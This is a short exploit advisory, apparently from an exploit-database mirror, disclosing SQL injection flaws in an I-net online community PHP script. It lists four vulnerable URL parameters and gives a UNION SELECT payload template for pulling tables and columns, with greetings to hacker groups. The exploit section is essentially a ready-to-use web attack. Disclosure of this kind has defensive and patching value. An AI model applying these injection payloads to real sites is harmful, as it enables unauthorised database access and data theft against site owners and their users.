Online Community CMS by I-net SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Online Community CMS by I-net SQL Injection Vulnerability. Exploit discovered on 16 March 2010, allowing SQL injection in various URLs


                                                # Exploit Title: Online Community CMS by I-net SQL Injection Vulnerability
# Date: 16-03-2010
# Author: Th3 RDX
# Software Link: www.i-netsolution.com/online-community-php-scripts.html
# Version:
# Tested on: Projects Made By Them
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Team I.C.W | www.IndiShell.in | Andhra Hackers | www.exploit-db.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to all Indian Cyber Warriors ,IndiShell, Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

[email protected]


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Online Community CMS by I-net SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.i-netsolution.com/online-community-php-scripts.html

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code
{e.g = Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6 (tables & column) }

[SQLi] http://server/onlinecommunity/view-blog-full.php?blid=69[CODE]

[SQLi] http://server/onlinecommunitys/mem-play-song-cnt.php?plid=23[CODE]

[SQLi] http://server/onlinecommunity/mem_videos-play-cnt.php?vdoid=41[CODE]

[SQLi] http://server/onlinecommunity/profile.php?mid=72[CODE]


%\\
##############################################################################

##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 16 March 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1